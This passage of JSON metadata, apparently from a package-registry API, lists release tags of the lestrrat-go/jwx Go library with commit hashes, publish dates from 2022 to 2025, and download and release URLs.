/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"htt